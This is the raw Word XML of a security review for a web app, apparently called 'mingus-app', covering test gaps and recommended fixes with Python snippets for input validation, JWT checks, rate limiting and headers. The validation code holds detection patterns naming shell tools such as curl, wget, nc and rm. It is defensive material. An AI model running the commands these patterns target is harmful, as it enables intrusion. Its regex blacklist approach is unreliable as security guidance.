    <w:p w14:paraId="58A4E47D" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994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XSS Prevention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Missing HTML/JavaScript injection patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DE7AEF" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994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NoSQL Injection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Missing MongoDB/NoSQL specific patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1EEF67" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994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Command Injection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Missing shell command patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD30E52" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D39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B. Authentication &amp; Authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED939B4" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D399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Issues to Address:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E878707" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994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JWT Token Security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Token expiration, signature validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3054132D" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994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Session Management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Session hijacking prevention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24707419" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994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Password Security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Brute force protection, password complexity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0922B941" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994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Privilege Escalation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Role-based access control validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1429A1BF" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D39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C. Data Protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2ED988" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D399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Issues to Address:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5BF246" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994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CSRF Protection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Cross-Site Request Forgery prevention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6A4649" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994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Encryption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Sensitive data encryption at rest and in transit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E175D13" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994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Rate Limiting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API rate limiting effectiveness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715A73CC" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994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Privacy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GDPR compliance, data anonymization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36194768" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D39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3. Security Test Coverage Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D522A6" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D399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Looking at the security test file (</w:t>
      </w:r>
      <w:r w:rsidRPr="006D3994">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:eastAsia="Times New Roman" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>tests/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D3994">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:eastAsia="Times New Roman" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>comprehensive_test_suite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D3994">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:eastAsia="Times New Roman" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/test_security.py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), the tests cover:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459EE0D1" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D39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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="006D399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Currently Tested Areas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2399B3" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994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Input Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCC6ED3" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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 injection prevention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C465CE" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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XSS protection verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09823873" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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NoSQL injection prevention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BC587C" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Command injection prevention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9B880B" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994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Authentication Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BEDAE0" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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JWT token validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDF84CA" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Session hijacking prevention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F602D0" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Privilege escalation prevention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D6BFB4" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Authentication bypass attempts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E852393" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994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Protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B2874F" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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CSRF token validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFDB16D" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Rate limiting effectiveness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128C6044" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Data privacy compliance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E55D6FD" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D39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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="006D399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Missing Security Tests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2569EC" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994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API Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5D5D8C" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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 method validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DAA364" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Content type validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BB23F2" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Request size limits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405ED4FA" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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API endpoint authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111D6166" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Frontend Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2E5315" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35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Content Security Policy (CSP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F361BFB" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Secure cookie settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DC2D5E" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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XSS prevention in React components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC57067" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Clickjacking protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4775DFA2" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Infrastructure Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101116E2" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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HTTPS enforcement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA78516" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Security headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A9848C" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Error handling security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4EA38A" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Logging security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE48CD9" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D39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4. Critical Security Fixes Needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FC1EA7" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D39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A. Enhanced Input Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11309A87" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994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python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A4E6D1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Recommended enhanced security validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21379521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enhanced_validate_input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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D3994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input_string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6C60C51D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SQL Injection patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5776D73B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sql_patterns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:p>
    <w:p w14:paraId="052BC948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r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(\b(union|select|insert|update|delete|drop|create|alter)\b)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7BD57045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r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(\b(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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exec|execute|script|javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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)\b)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46411235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r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(--|#|/\*|\*/)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496460EE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r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(\b(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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or|and</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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)\b\s</w:t>
      </w:r>
      <w:r w:rsidRPr="006D3994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+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\d</w:t>
      </w:r>
      <w:r w:rsidRPr="006D3994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+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\s</w:t>
      </w:r>
      <w:r w:rsidRPr="006D3994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[=&lt;&gt;])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</w:p>
    <w:p w14:paraId="2AE776F5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</w:p>
    <w:p w14:paraId="0CCB6F72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737F251A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XSS patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBF5B97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xss_patterns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:p>
    <w:p w14:paraId="1B29A785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r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(&lt;script[^&gt;]</w:t>
      </w:r>
      <w:r w:rsidRPr="006D3994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&gt;.</w:t>
      </w:r>
      <w:r w:rsidRPr="006D3994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*?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&lt;/script&gt;)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280C4FF1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r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javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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:.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006D3994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7B6393FC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r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(on\w</w:t>
      </w:r>
      <w:r w:rsidRPr="006D3994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+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\s</w:t>
      </w:r>
      <w:r w:rsidRPr="006D3994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=)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363116AB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r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(&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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[^&gt;]</w:t>
      </w:r>
      <w:r w:rsidRPr="006D3994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&gt;)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</w:p>
    <w:p w14:paraId="143F7C29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</w:p>
    <w:p w14:paraId="628AE2CC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052B84E7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Command injection patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71964EC2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cmd_patterns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:p>
    <w:p w14:paraId="2E585533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r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(\b(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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cat|ls|pwd|whoami|id|uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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)\b)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0DC94E96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r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(\b(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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rm|del|mkdir|touch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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)\b)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7ED887C9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r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(\b(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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wget|curl|nc|telnet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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)\b)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</w:p>
    <w:p w14:paraId="53DE2C2B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</w:p>
    <w:p w14:paraId="0D515B18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052069A9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input_lower</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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input_string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lower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</w:p>
    <w:p w14:paraId="478225E0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66F3E607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for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pattern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in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sql_patterns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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xss_patterns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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cmd_patterns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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35CC8AB6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if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search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pattern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input_lower</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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IGNORECASE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02F23EBD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False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225D8B3D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True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B36DF0" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D39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B. JWT Security Enhancement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738D8BAB" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994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python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18340626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Enhanced JWT security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDCB05B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secure_jwt_validation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6D3994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token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136650A7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try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5730D5FB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Verify token signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078DEAAF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payload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jwt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decode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</w:p>
    <w:p w14:paraId="6A70EFA6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token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</w:p>
    <w:p w14:paraId="09A6965D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SECRET_KEY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</w:p>
    <w:p w14:paraId="56E32635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  <w:r w:rsidRPr="006D3994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algorithms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[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'HS256'</w:t>
      </w:r>
      <w:r w:rsidRPr="006D399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]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633D9079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  <w:r w:rsidRPr="006D3994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options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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDC6E43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   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verify</w:t>
      </w:r>
      <w:proofErr w:type="gram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_signature</w:t>
      </w:r>
      <w:proofErr w:type="spell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True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627EE74A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   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verify</w:t>
      </w:r>
      <w:proofErr w:type="gram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_exp</w:t>
      </w:r>
      <w:proofErr w:type="spell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True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397BF1C0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   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verify</w:t>
      </w:r>
      <w:proofErr w:type="gram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_iat</w:t>
      </w:r>
      <w:proofErr w:type="spell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True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62F633DB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   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'require'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6D3994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[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'exp'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iat</w:t>
      </w:r>
      <w:proofErr w:type="spell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'sub'</w:t>
      </w:r>
      <w:r w:rsidRPr="006D3994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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3041FC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  <w:r w:rsidRPr="006D399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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486029D4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2C317638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</w:p>
    <w:p w14:paraId="009111C6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Check token expiration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58637AB9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if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payload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'exp'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time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time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7B67E1F9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False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B54FFCC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</w:p>
    <w:p w14:paraId="66E61624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Check issuer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EC4589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if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payload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iss</w:t>
      </w:r>
      <w:proofErr w:type="spell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!=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mingus</w:t>
      </w:r>
      <w:proofErr w:type="spell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-app'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3A34662C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False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074071D1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</w:p>
    <w:p w14:paraId="4E5B0B82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True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D556FE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except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jwt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InvalidTokenError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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3476FCCE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False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CD3CF5" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D39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C. Rate Limiting Implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A85FD8" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994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python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7196F7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Enhanced rate limiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B97618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secure_rate_limiting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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D3994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user_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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6D3994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endpoint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1AF45402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key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"rate_limit</w:t>
      </w:r>
      <w:proofErr w:type="spell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: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user_id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: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endpoint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</w:p>
    <w:p w14:paraId="2A4789AC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current_requests</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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redis_client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key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15796720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6D75EFB8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if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current_requests </w:t>
      </w:r>
      <w:r w:rsidRPr="006D3994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and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current_requests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MAX_REQUESTS_PER_MINUTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607A4F6B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False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F459329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3B2B7D30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redis_client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incr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key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0E6E667E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redis_client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expire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key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60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gramStart"/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1 minute</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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 window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5EB143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True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C327BE" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D39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5. Security Headers Implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D853AE" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994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python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0F01C4" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D399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Security headers middleware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC3A7F3" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D399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security_headers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6D3994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response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590EF6C2" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D399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response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headers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'X-Content-Type-Options'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nosniff</w:t>
      </w:r>
      <w:proofErr w:type="spell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</w:p>
    <w:p w14:paraId="2E1D5661" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D399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response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headers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'X-Frame-Options'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'DENY'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3687A247" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D399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response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headers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'X-XSS-Protection'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'1; mode=block'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C694BDF" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D399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response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headers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'Strict-Transport-Security'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'max-age=31536000; includeSubDomains'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9067D4" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D399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response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headers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'Content-Security-Policy'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"default-src 'self'; script-src 'self' 'unsafe-inline'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EC043C" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D399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response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headers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'Referrer-Policy'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'strict-origin-when-cross-origin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6B51EE" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D399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response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0932F307" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D39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6. Priority Security Fixes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A205AD" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D39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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>🔴</w:t>
      </w:r>
      <w:r w:rsidRPr="006D399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Critical (Fix Immediately):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC05ED2" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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SQL Injection Prevention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Implement parameterized queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B024EC6" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994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XSS Protection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Sanitize all user inputs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4294BA0D" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Authentication Bypass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Strengthen JWT validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB2606F" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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CSRF Protection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Implement CSRF tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2A68BF" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D39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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>🟡</w:t>
      </w:r>
      <w:r w:rsidRPr="006D399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 High (Fix Soon):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02017335" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Rate Limiting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Implement per-user rate limiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAD69A3" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Encryption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Encrypt sensitive data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BA3A3A" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Security Headers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Add security headers to all responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A58B3C1" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Error Handling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Prevent information disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F4C502" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D39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Apple Color Emoji" w:eastAsia="Times New Roman" w:hAnsi="Apple Color Emoji" w:cs="Apple Color Emoji"/>
